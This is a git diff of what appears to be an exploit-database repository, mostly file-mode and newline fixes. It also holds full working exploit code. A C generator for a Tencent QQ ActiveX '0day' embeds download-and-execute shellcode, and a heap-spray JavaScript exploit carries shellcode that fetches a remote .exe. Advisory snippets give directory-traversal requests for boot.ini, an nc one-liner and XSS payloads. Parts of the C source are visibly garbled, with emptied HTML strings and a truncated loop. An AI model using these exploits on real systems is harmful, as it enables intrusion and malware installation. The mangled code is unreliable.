"; - - char * trigger = - - " " - - " " - - " " - - " " - - " "; - - // print unicode shellcode - - void PrintPayLoad(char *lpBuff, int buffsize) - - { - - int i; - - for(i=0;i{ - - if((i%16)==0) - - { - - if(i!=0) - - { - - printf("" ""); - - fprintf(fp, "%s", "" + ""); - - } - - else - - { - - printf("""); - - fprintf(fp, "%s", """); - - } - - } - - printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]); - - fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]); - - } - - //?shellcode???header??,??? " ) " ?? - - printf(""; "); - - fprintf(fp, "%s", ""); "); - - fflush(fp); - - } - - void main(int argc, char **argv) - - { - - unsigned char buf[1024] = {0}; - - int sc_len = 0; - - if (argc < 2) - - { - - printf("Tencent QQ VQQPlayer.ocx (all version) 0day! "); - - printf("Bug Found by axis@ph4nt0m "); - - printf("Date: 2006-12-27 "); - - printf(" Usage: %s [Local htmlfile] ", argv[0]); - - exit(1); - - } - - url = argv[1]; - - if( (!strstr(url, "http://") && !strstr(url, "ftp://")) strlen(url) < 10) - - { - - printf("[-] Invalid url. Must start with 'http://','ftp://' "); - - return; - - } - - printf("[+] download url:%s ", url); - - if(argc >=3) file = argv[2]; - - printf("[+] exploit file:%s ", file); - - fp = fopen(file, "w"); - - if(!fp) - - { - - printf("[-] Open file error! "); - - return; - - } - - //build evil html file - - fprintf(fp, "%s", header); - - fflush(fp); - - memset(buf, 0, sizeof(buf)); - - sc_len = sizeof(sc)-1; - - memcpy(buf, sc, sc_len); - - memcpy(buf+sc_len, url, strlen(url)); - - sc_len += strlen(url)+1; - - PrintPayLoad((char *)buf, sc_len); - - fprintf(fp, "%s", footer); - - fflush(fp); - - fprintf(fp, "%s", trigger); - - fflush(fp); - - printf("[+] exploit write to %s success! ", file); - - } \ No newline at end of file +*/ + +#include +#include +#include +FILE *fp = NULL; +char *file = "fuck_exp1.html"; +char *url = NULL; +unsigned char sc[] = +"x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70" +"x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8" +"xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00" +"x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00" +"x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45" +"x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40" +"x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75" +"x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00" +"x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5" +"x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a" +"x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c" +"x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c" +"x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45" +"x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59" +"x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08" +"x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00" +"x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03" +"xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7" +"x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c" +"x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41" +"xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d" +"x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24" +"x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5" +"x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e" +"x00"; +char * header = +" " +" " +" " +" "; +char * trigger = +" " +" " +" " +" " +" "; +// print unicode shellcode +void PrintPayLoad(char *lpBuff, int buffsize) +{ +int i; +for(i=0;i{ +if((i%16)==0) +{ +if(i!=0) +{ +printf("" ""); +fprintf(fp, "%s", "" + ""); +} +else +{ +printf("""); +fprintf(fp, "%s", """); +} +} +printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]); +fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]); +} +//?shellcode???header??,??? " ) " ?? +printf(""; "); +fprintf(fp, "%s", ""); "); +fflush(fp); +} +void main(int argc, char **argv) +{ +unsigned char buf[1024] = {0}; +int sc_len = 0; +if (argc < 2) +{ +printf("Tencent QQ VQQPlayer.ocx (all version) 0day! "); +printf("Bug Found by axis@ph4nt0m "); +printf("Date: 2006-12-27 "); +printf(" Usage: %s [Local htmlfile] ", argv[0]); +exit(1); +} +url = argv[1]; +if( (!strstr(url, "http://") && !strstr(url, "ftp://")) strlen(url) < 10) +{ +printf("[-] Invalid url. Must start with 'http://','ftp://' "); +return; +} +printf("[+] download url:%s ", url); +if(argc >=3) file = argv[2]; +printf("[+] exploit file:%s ", file); +fp = fopen(file, "w"); +if(!fp) +{ +printf("[-] Open file error! "); +return; +} +//build evil html file +fprintf(fp, "%s", header); +fflush(fp); +memset(buf, 0, sizeof(buf)); +sc_len = sizeof(sc)-1; +memcpy(buf, sc, sc_len); +memcpy(buf+sc_len, url, strlen(url)); +sc_len += strlen(url)+1; +PrintPayLoad((char *)buf, sc_len); +fprintf(fp, "%s", footer); +fflush(fp); +fprintf(fp, "%s", trigger); +fflush(fp); +printf("[+] exploit write to %s success! ", file); +} \ No newline at end of file diff --git a/platforms/windows/remote/3084.txt b/platforms/windows/remote/3084.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30883.js b/platforms/windows/remote/30883.js old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30897.html b/platforms/windows/remote/30897.html old mode 100755 new mode 100644 index cb3d56cff..18fc3f45e --- a/platforms/windows/remote/30897.html +++ b/platforms/windows/remote/30897.html @@ -42,4 +42,4 @@ IMWebControl.SetHandler puf puf="" IMWebControl.ProcessRequestEx puf </script> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/30901.txt b/platforms/windows/remote/30901.txt old mode 100755 new mode 100644 index 6d30c8915..6a900fd4f --- a/platforms/windows/remote/30901.txt +++ b/platforms/windows/remote/30901.txt @@ -10,4 +10,4 @@ This issue affects Apache 2.2.6 when serving PHP files from a Windows SMB share; NOTE: This issue may also occur when handling other filename extensions that use AddType directives to associate scripts or executables (e.g. '.cgi\', '.py\', '.rb\', etc.). -http://www.example.com/winshare/info.php\ \ No newline at end of file +http://www.example.com/winshare/info.php\ \ No newline at end of file diff --git a/platforms/windows/remote/30908.txt b/platforms/windows/remote/30908.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3092.pm b/platforms/windows/remote/3092.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30920.html b/platforms/windows/remote/30920.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30939.txt b/platforms/windows/remote/30939.txt old mode 100755 new mode 100644 index 28423cba9..801ceed47 --- a/platforms/windows/remote/30939.txt +++ b/platforms/windows/remote/30939.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects ImgSvr 0.6.21; other versions may also be vulnerable. -http://www.example.com/../[code] \ No newline at end of file +http://www.example.com/../[code] \ No newline at end of file diff --git a/platforms/windows/remote/310.txt b/platforms/windows/remote/310.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31023.html b/platforms/windows/remote/31023.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31032.txt b/platforms/windows/remote/31032.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31039.txt b/platforms/windows/remote/31039.txt old mode 100755 new mode 100644 index 0d923d0a0..0a252b418 --- a/platforms/windows/remote/31039.txt +++ b/platforms/windows/remote/31039.txt @@ -6,4 +6,4 @@ Exploiting this issue allows an attacker to access potentially sensitive informa BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected. -echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port> \ No newline at end of file +echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port> \ No newline at end of file diff --git a/platforms/windows/remote/31040.html b/platforms/windows/remote/31040.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31046.cpp b/platforms/windows/remote/31046.cpp old mode 100755 new mode 100644 index 72e22d475..4dd036a4c --- a/platforms/windows/remote/31046.cpp +++ b/platforms/windows/remote/31046.cpp @@ -77,4 +77,4 @@ fclose(file); printf("make 'knell.html' successed!\n"); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/31056.py b/platforms/windows/remote/31056.py index e03776ae2..aeeeb873c 100755 --- a/platforms/windows/remote/31056.py +++ b/platforms/windows/remote/31056.py @@ -330,5 +330,4 @@ while s != "quit": except EOFError: s = "quit" print s - print result(s) - \ No newline at end of file + print result(s) \ No newline at end of file diff --git a/platforms/windows/remote/3107.pm b/platforms/windows/remote/3107.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31072.html b/platforms/windows/remote/31072.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31113.html b/platforms/windows/remote/31113.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31118.c b/platforms/windows/remote/31118.c old mode 100755 new mode 100644 index be1d1d8f4..3388fbd26 --- a/platforms/windows/remote/31118.c +++ b/platforms/windows/remote/31118.c @@ -246,4 +246,4 @@ uszShellcode ) - 1 ); fclose( f ); printf("[+] .WPS file succesfully created!\n"); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/31149.txt b/platforms/windows/remote/31149.txt old mode 100755 new mode 100644 index 8983540d5..8b1006906 --- a/platforms/windows/remote/31149.txt +++ b/platforms/windows/remote/31149.txt @@ -8,4 +8,4 @@ This issue affects Protection Server 7.4.1.0 and Keys Server 1.0.4; earlier vers NOTE: This issue may be caused by an incomplete security patch released in November 2007 that was documented in BID 26583 ('Sentinel Protection Server/Keys Server Directory Traversal Vulnerability'). -GET /..\..\..\..\..\..\..\boot.ini HTTP/1.0 \ No newline at end of file +GET /..\..\..\..\..\..\..\boot.ini HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/31163.txt b/platforms/windows/remote/31163.txt old mode 100755 new mode 100644 index f1541c7f2..4c9584f3d --- a/platforms/windows/remote/31163.txt +++ b/platforms/windows/remote/31163.txt @@ -8,4 +8,4 @@ These issues affect WinIPDS 3.3 rev. G52-33-021; prior versions may also be affe GET /../../../../../boot.ini HTTP/1.0 or -POST /..\../..\../..\boot.ini HTTP/1.0 \ No newline at end of file +POST /..\../..\../..\boot.ini HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/31179.html b/platforms/windows/remote/31179.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31204.txt b/platforms/windows/remote/31204.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31231.txt b/platforms/windows/remote/31231.txt old mode 100755 new mode 100644 index d29557103..3b5252582 --- a/platforms/windows/remote/31231.txt +++ b/platforms/windows/remote/31231.txt @@ -7,4 +7,4 @@ Exploiting this issue may allow an attacker to access sensitive information that This issue affects SCI Photo Chat 3.4.9 and prior versions. GET /docs/..\..\..\..\..\boot.ini HTTP/1.0 -GET /docs/../../../../../boot.ini HTTP/1.0 \ No newline at end of file +GET /docs/../../../../../boot.ini HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/31254.py b/platforms/windows/remote/31254.py index 2c4e38285..33570774e 100755 --- a/platforms/windows/remote/31254.py +++ b/platforms/windows/remote/31254.py @@ -60,7 +60,4 @@ else: conn.send('ABOR '+sploit+'\r\n') cf = conn.recv(1024) #close connection - conn.close() - - - \ No newline at end of file + conn.close() \ No newline at end of file diff --git a/platforms/windows/remote/31255.py b/platforms/windows/remote/31255.py index 035ce89af..d75d7c798 100755 --- a/platforms/windows/remote/31255.py +++ b/platforms/windows/remote/31255.py @@ -60,7 +60,4 @@ else: conn.send('CWD '+sploit+'\r\n') cf = conn.recv(1024) #close connection - conn.close() - - - \ No newline at end of file + conn.close() \ No newline at end of file diff --git a/platforms/windows/remote/313.txt b/platforms/windows/remote/313.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31345.txt b/platforms/windows/remote/31345.txt old mode 100755 new mode 100644 index 09d5310d3..4ffb575a1 --- a/platforms/windows/remote/31345.txt +++ b/platforms/windows/remote/31345.txt @@ -6,4 +6,4 @@ Exploiting this issue allows an attacker to access arbitrary files outside of th eScan Server 9.0.742.98 is vulnerable to this issue; other versions may also be affected. -ftp://SERVER:2021//windows/win.ini \ No newline at end of file +ftp://SERVER:2021//windows/win.ini \ No newline at end of file diff --git a/platforms/windows/remote/31359.html b/platforms/windows/remote/31359.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3137.html b/platforms/windows/remote/3137.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31395.txt b/platforms/windows/remote/31395.txt old mode 100755 new mode 100644 index c5a00496c..ef62240e9 --- a/platforms/windows/remote/31395.txt +++ b/platforms/windows/remote/31395.txt @@ -8,4 +8,4 @@ The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-sit These issues affect versions prior to UCP 4.2 when running on Microsoft Windows. -http://www.example.com/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E \ No newline at end of file +http://www.example.com/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E \ No newline at end of file diff --git a/platforms/windows/remote/31405.c b/platforms/windows/remote/31405.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31407.txt b/platforms/windows/remote/31407.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31409.txt b/platforms/windows/remote/31409.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31465.cs b/platforms/windows/remote/31465.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/315.txt b/platforms/windows/remote/315.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31534.html b/platforms/windows/remote/31534.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31536.txt b/platforms/windows/remote/31536.txt old mode 100755 new mode 100644 index e88240798..6e8236bb2 --- a/platforms/windows/remote/31536.txt +++ b/platforms/windows/remote/31536.txt @@ -6,4 +6,4 @@ Exploiting this issue allows an attacker to access arbitrary files outside of th This issue affects versions prior to File Transfer 1.2f. -../../../../../../../boot.ini \ No newline at end of file +../../../../../../../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/31562.txt b/platforms/windows/remote/31562.txt old mode 100755 new mode 100644 index 0ff0c1ae4..c694de477 --- a/platforms/windows/remote/31562.txt +++ b/platforms/windows/remote/31562.txt @@ -7,4 +7,4 @@ Exploiting this issue allows an attacker to access arbitrary files outside of th 2X ThinClientServer 5.0 sp1-r3497 with TFTPd.exe 3.2.0.0 is vulnerable; other versions may also be affected. tftpx SERVER .../.../.../.../.../.../boot.ini none -tftpx SERVER ...\...\...\...\...\...\windows\win.ini none \ No newline at end of file +tftpx SERVER ...\...\...\...\...\...\windows\win.ini none \ No newline at end of file diff --git a/platforms/windows/remote/3158.c b/platforms/windows/remote/3158.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31583.txt b/platforms/windows/remote/31583.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/316.txt b/platforms/windows/remote/316.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31624.txt b/platforms/windows/remote/31624.txt old mode 100755 new mode 100644 index 0153e83a0..6e3672562 --- a/platforms/windows/remote/31624.txt +++ b/platforms/windows/remote/31624.txt @@ -8,4 +8,4 @@ This issue affects Internet Explorer 7. Reportedly, Internet Explorer 8 is not v This issue may be related to the vulnerability discussed in BID 28581 (Microsoft Internet Explorer 'ieframe.dll' Script Injection Vulnerability). -<?php header("location: res://ieframe.dll/24/123"); ?> <script> var xml = new XMLHttpRequest(); xml.open("GET","/the_header_file.php"); xml.onreadystatechange=function (){ if (xml.readyState == 4){ alert(xml.responseText) } } xml.send(null); </script> \ No newline at end of file +<?php header("location: res://ieframe.dll/24/123"); ?> <script> var xml = new XMLHttpRequest(); xml.open("GET","/the_header_file.php"); xml.onreadystatechange=function (){ if (xml.readyState == 4){ alert(xml.responseText) } } xml.send(null); </script> \ No newline at end of file diff --git a/platforms/windows/remote/31632.txt b/platforms/windows/remote/31632.txt old mode 100755 new mode 100644 index 44cec2437..c43d6e937 --- a/platforms/windows/remote/31632.txt +++ b/platforms/windows/remote/31632.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow the attacker to execute HTML and script code in Microsoft SharePoint Server 2.0 is vulnerable; other versions may also be affected. -"""></P></div></td><script>[your javascript here]</script> \ No newline at end of file +"""></P></div></td><script>[your javascript here]</script> \ No newline at end of file diff --git a/platforms/windows/remote/31638.txt b/platforms/windows/remote/31638.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3168.java b/platforms/windows/remote/3168.java old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31699.txt b/platforms/windows/remote/31699.txt old mode 100755 new mode 100644 index 2ad4dcd39..5fae24473 --- a/platforms/windows/remote/31699.txt +++ b/platforms/windows/remote/31699.txt @@ -6,4 +6,4 @@ A successful attack may aid in phishing-style attacks. This issue affects RSA Authentication Agent for Web for Internet Information Services 5.3.0.258. Other versions may also be affected. -https://www.example.com/WebID/IISWebAgentIF.dll?Redirect?url=ftp://www.example2.com/index.htm \ No newline at end of file +https://www.example.com/WebID/IISWebAgentIF.dll?Redirect?url=ftp://www.example2.com/index.htm \ No newline at end of file diff --git a/platforms/windows/remote/3170.pm b/platforms/windows/remote/3170.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31759.txt b/platforms/windows/remote/31759.txt old mode 100755 new mode 100644 index 8143db5ee..5d27ba60d --- a/platforms/windows/remote/31759.txt +++ b/platforms/windows/remote/31759.txt @@ -10,4 +10,4 @@ Other browsers may also be affected under certain configurations, but this has n NOTE: This BID was originally titled 'Apache HTTP Server 403 Error Cross-Site Scripting Vulnerability'. -http://www.example.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9 idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss') +ADw-/script+AD4---//-- \ No newline at end of file +http://www.example.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9 idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss') +ADw-/script+AD4---//-- \ No newline at end of file diff --git a/platforms/windows/remote/31769.html b/platforms/windows/remote/31769.html old mode 100755 new mode 100644 index 54d7ec6e5..fa06d9bed --- a/platforms/windows/remote/31769.html +++ b/platforms/windows/remote/31769.html @@ -6,4 +6,4 @@ An attacker can exploit this issue to run arbitrary attacker-supplied code in th Note that GlobalLink 2.8.1.2 beta is also affected by this issue. -<script> document.writeln("<html>"); document.writeln("<object classid=\"clsid:F917534D-535B-416B-8E8F-0C04756C31A8\" id=\'target\'><\/object>"); document.writeln("<body>"); document.writeln("<SCRIPT language=\"JavaScript\">"); document.writeln("var cikeqq575562708 = \"%u9090%u6090\" +"); document.writeln("\"%u17eb%u645e%u30a1%u0000\" +"); document.writeln("\"%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0\" +"); document.writeln("\"%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad\" +"); document.writeln("\"%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503\" +"); document.writeln("\"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d\" +"); document.writeln("\"%u6856%ufe98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e\" +"); document.writeln("\"%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1%ub8e5%u95e8\" +"); document.writeln("\"%u0000%u8900%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900\" +"); document.writeln("\"%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845%u6856\" +"); document.writeln("\"%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900\" +"); document.writeln("\"%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00\" +"); document.writeln("\"%u285d%uff53%u0455%u6850%u1a36%u702f%u3fe8%u0000%u8900\" +"); document.writeln("\"%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e\" +"); document.writeln("\"%uc778%u0544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075\" +"); document.writeln("\"%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200\" +"); document.writeln("\"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b\" +"); document.writeln("\"%u560c%u738b%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3\" +"); document.writeln("\"%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1\" +"); document.writeln("\"%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324\" +"); document.writeln("\"%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5%u595b\" +"); document.writeln("\"%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100\" +"); document.writeln("\"%u0000%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07\" +"); document.writeln("\"%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u4589%uc724\" +"); document.writeln("\"%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574\" +"); document.writeln("\"%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08%ub8f0%u0fe4\" +"); document.writeln("\"%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700\" +"); document.writeln("\"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474\" +"); document.writeln("\"%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff56%u1055%u06c7\" +"); document.writeln("\"%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b\" +"); document.writeln("\"%u5324%u5251%u5756%uecb9%u020f%u8b00%u8519%u75db%u3350\" +"); document.writeln("\"%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e\" +"); document.writeln("\"%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f\" +"); document.writeln("\"%u8318%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068\" +"); document.writeln("\"%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824\" +"); document.writeln("\"%uecb9%u020f%uff00%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00\" +"); document.writeln("\"%ue820%ufdda%uffff\" +"); document.writeln("\"%u7468%u7074%u2f3a%u772f%u7777%u622e%u6961%u7564%u6f75%u632e%u2f6e%u3231%u2f33%u6b6f%u652e%u6578\";"); document.writeln("var shellcode = unescape(cikeqq575562708);"); document.writeln("var nop = \"tmp9090tmp9090\";"); document.writeln("var Cike = unescape(nop.replace(\/tmp\/g,\"%u\"));"); document.writeln("while (Cike.length<224) Cike+=Cike;"); document.writeln("fillvcbcv = Cike.substring(0, 224);"); document.writeln("vcbcv = Cike.substring(0, Cike.length-224);"); document.writeln("while(vcbcv.length+224<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv;"); document.writeln("gdfgdh = new Array();"); document.writeln("for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode;"); document.writeln("var hellohack = \'\';"); document.writeln("while (hellohack.length < 600) hellohack+=\'\\x0a\\x0a\\x0a\\x0a\';"); document.writeln("target[\"\\x49\\x45\\x53\\x74\\x61\\x72\\x74\\x4e\\x61\\x74\\x69\\x76\\x65\"](hellohack,\"CikeVipWm\",\"fuckyou\");"); document.writeln("<\/script>"); document.writeln("<\/body>"); document.writeln("<\/html>"); document.writeln("") </script> \ No newline at end of file +<script> document.writeln("<html>"); document.writeln("<object classid=\"clsid:F917534D-535B-416B-8E8F-0C04756C31A8\" id=\'target\'><\/object>"); document.writeln("<body>"); document.writeln("<SCRIPT language=\"JavaScript\">"); document.writeln("var cikeqq575562708 = \"%u9090%u6090\" +"); document.writeln("\"%u17eb%u645e%u30a1%u0000\" +"); document.writeln("\"%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0\" +"); document.writeln("\"%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad\" +"); document.writeln("\"%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503\" +"); document.writeln("\"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d\" +"); document.writeln("\"%u6856%ufe98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e\" +"); document.writeln("\"%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1%ub8e5%u95e8\" +"); document.writeln("\"%u0000%u8900%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900\" +"); document.writeln("\"%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845%u6856\" +"); document.writeln("\"%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900\" +"); document.writeln("\"%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00\" +"); document.writeln("\"%u285d%uff53%u0455%u6850%u1a36%u702f%u3fe8%u0000%u8900\" +"); document.writeln("\"%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e\" +"); document.writeln("\"%uc778%u0544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075\" +"); document.writeln("\"%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200\" +"); document.writeln("\"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b\" +"); document.writeln("\"%u560c%u738b%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3\" +"); document.writeln("\"%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1\" +"); document.writeln("\"%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324\" +"); document.writeln("\"%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5%u595b\" +"); document.writeln("\"%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100\" +"); document.writeln("\"%u0000%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07\" +"); document.writeln("\"%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u4589%uc724\" +"); document.writeln("\"%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574\" +"); document.writeln("\"%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08%ub8f0%u0fe4\" +"); document.writeln("\"%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700\" +"); document.writeln("\"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474\" +"); document.writeln("\"%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff56%u1055%u06c7\" +"); document.writeln("\"%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b\" +"); document.writeln("\"%u5324%u5251%u5756%uecb9%u020f%u8b00%u8519%u75db%u3350\" +"); document.writeln("\"%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e\" +"); document.writeln("\"%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f\" +"); document.writeln("\"%u8318%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068\" +"); document.writeln("\"%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824\" +"); document.writeln("\"%uecb9%u020f%uff00%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00\" +"); document.writeln("\"%ue820%ufdda%uffff\" +"); document.writeln("\"%u7468%u7074%u2f3a%u772f%u7777%u622e%u6961%u7564%u6f75%u632e%u2f6e%u3231%u2f33%u6b6f%u652e%u6578\";"); document.writeln("var shellcode = unescape(cikeqq575562708);"); document.writeln("var nop = \"tmp9090tmp9090\";"); document.writeln("var Cike = unescape(nop.replace(\/tmp\/g,\"%u\"));"); document.writeln("while (Cike.length<224) Cike+=Cike;"); document.writeln("fillvcbcv = Cike.substring(0, 224);"); document.writeln("vcbcv = Cike.substring(0, Cike.length-224);"); 